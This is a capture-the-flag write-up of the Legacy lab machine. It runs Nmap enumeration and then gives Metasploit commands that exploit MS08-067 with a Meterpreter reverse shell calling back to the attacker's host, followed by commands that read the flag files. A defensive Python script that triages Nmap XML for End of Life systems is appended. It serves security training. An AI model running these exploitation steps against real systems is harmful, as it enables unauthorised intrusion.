Another OSCP-like Box: Legacy

@ro0taddict
4 min read · Mar 1, 2021

This is my fourth writeup for this series.

Enumeration

I started my enumeration with Nmap. I like to do a staged scan, so here I started with a very fast scan (-T5) on the top 1000 TCP ports.

sudo nmap -T5 -n -vvv -oA initial-scan 10.10.10.4

Figure 1.0

I found that TCP ports 139 and 445 are open. I then performed a targeted scan on those ports.

sudo nmap -sC -sV -O -p139,445 -oA targeted 10.10.10.4

  • -sC runs the default NSE scripts
  • -sV performs service version detection
  • -O enables operating system detection
  • -p specifies the ports to scan
  • -oA writes the results in all three output formats (normal, grepable and XML)

Figure 1.1

All Ports

I ran a scan of all 65535 TCP ports using the command below.

sudo nmap -p- -oA allports 10.10.10.4

Figure 1.2

Based on Figure 1.1, Nmap detected that the target is possibly a Windows XP SP3 machine. I then performed a basic vulnerability scan on this target using NSE scripts.

sudo nmap --script vuln -p139,445 -oA vuln-scan 10.10.10.4

Figure 1.3

Based on Figure 1.3, Nmap found that the target is possibly vulnerable to MS08-067 and MS17-010.

I validated whether the host is indeed vulnerable to MS08-067 using the "check" command of the Metasploit module, which probes the service without launching the exploit. Based on the output in Figure 1.3, the host is indeed vulnerable.

search ms08-067
use 0
set rhosts 10.10.10.4
check

Figure 1.3

Exploitation

I then exploited the target using the same Metasploit module. Please note that this exploit will most likely crash the SMB service if the wrong target is selected, so we need to be accurate with the target information. Run "show targets" to list all available targets.

Figure 1.4

It seemed that I had multiple targets to choose from. I then used the smb_version auxiliary scanner in Metasploit to accurately identify the operating system and its Service Pack level.

search smb_version type:auxiliary
use 0
set rhost 10.10.10.4
run

Figure 1.5

The scanner showed that the target is running Windows XP SP3 English. In the MS08-067 exploit module, the two possible targets for that build are numbers 6 and 7.

Figure 1.6

I started with "Target 6", used "windows/meterpreter/reverse_tcp" as the payload, and set "lhost" (the IP of my Kali machine) and "lport" (any unused port on Kali).

use exploit/windows/smb/ms08_067_netapi
set rhosts 10.10.10.4
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.4
set lport 5555
set target 6
exploit

Figure 1.7

I successfully obtained shell access on the target with NT AUTHORITY\SYSTEM privileges.

Flags

shell
net users
type "C:\Documents and Settings\john\Desktop\user.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"

Figure 1.9

Key Takeaways

  • Use staged scanning when performing initial enumeration: a fast top-ports scan first, then targeted and full-port scans.
  • Utilize the Nmap NSE vuln scripts for a basic vulnerability scan. If allowed, start with an automated vulnerability scanner such as Nessus, then perform manual validation.
  • Be careful with certain exploits that will most likely crash a service if the target information is wrong.
  • MS08-067 and MS17-010 are old, well-known vulnerabilities. Apply the necessary patches.
  • Don't use End of Life systems if at all possible, but if it can't be avoided, apply the necessary compensating security controls.
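The NSE vuln scan above and the last two takeaways (patch known vulnerabilities, track End of Life systems) are exactly the kind of thing worth automating on the defensive side. The script below is an added example, not part of ro0taddict's writeup or of Nmap: it parses the XML file that "-oA" writes, lists open ports, and flags hosts whose OS fingerprint matches an End of Life marker or whose NSE vuln scripts reported a VULNERABLE state. The embedded XML is constructed to mimic Nmap's schema (abbreviated, not real scanner output), and the EOL_OS_MARKERS list is an assumption a defender would maintain for their own environment.

```python
"""Triage Nmap XML output for End of Life operating systems and NSE vuln-script hits.

Added example. Run with the .xml produced by `nmap -oA <name> ...`:
    python3 nmap_triage.py vuln-scan.xml
Without an argument it triages the constructed sample below.
"""
import sys
import xml.etree.ElementTree as ET

# Assumption: a defender-maintained list of OS name fragments that mean "no more patches".
EOL_OS_MARKERS = ("Windows XP", "Windows 2000", "Windows Server 2003")

# Constructed sample mimicking Nmap's XML schema for a host like the one in this writeup.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sC -sV -O --script vuln -p139,445 10.10.10.4">
  <host>
    <status state="up"/>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="95"/></os>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="VULNERABLE: (abbreviated)">
        <table key="smb-vuln-ms08-067"><elem key="state">VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: (abbreviated)">
        <table key="smb-vuln-ms17-010"><elem key="state">VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
</nmaprun>
"""


def _script_reports_vulnerable(script):
    """Prefer the structured <elem key="state"> value; fall back to the output text."""
    state = script.find(".//elem[@key='state']")
    if state is not None:
        return (state.text or "").strip() == "VULNERABLE"
    return "VULNERABLE" in (script.get("output") or "")


def parse_nmap_xml(xml_text):
    """Return one dict per host: address, open TCP/UDP ports, OS matches, vuln script ids."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        address = host.find("address")
        open_ports = sorted(
            int(port.get("portid"))
            for port in host.iter("port")
            if port.find("state") is not None and port.find("state").get("state") == "open"
        )
        os_names = [match.get("name") for match in host.iter("osmatch")]
        vuln_scripts = [s.get("id") for s in host.iter("script") if _script_reports_vulnerable(s)]
        hosts.append({
            "addr": address.get("addr") if address is not None else None,
            "open_ports": open_ports,
            "os": os_names,
            "vuln": vuln_scripts,
        })
    return hosts


def triage(hosts):
    """Produce (address, category, detail) findings: one EOL_OS per host, one NSE_VULN per hit."""
    findings = []
    for host in hosts:
        for name in host["os"]:
            if any(marker in name for marker in EOL_OS_MARKERS):
                findings.append((host["addr"], "EOL_OS", name))
                break  # one EOL finding per host is enough
        for script_id in host["vuln"]:
            findings.append((host["addr"], "NSE_VULN", script_id))
    return findings


if __name__ == "__main__":
    xml_text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    for addr, category, detail in triage(parse_nmap_xml(xml_text)):
        print(f"{addr}\t{category}\t{detail}")
```

The structured `<elem key="state">` check is used first because script output text is free-form and differs between scripts; the substring fallback only applies when a script emits no table at all. Feeding the real vuln-scan.xml from the targeted scan into this script gives a machine-readable list a patching or asset team can act on, rather than a screenshot.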
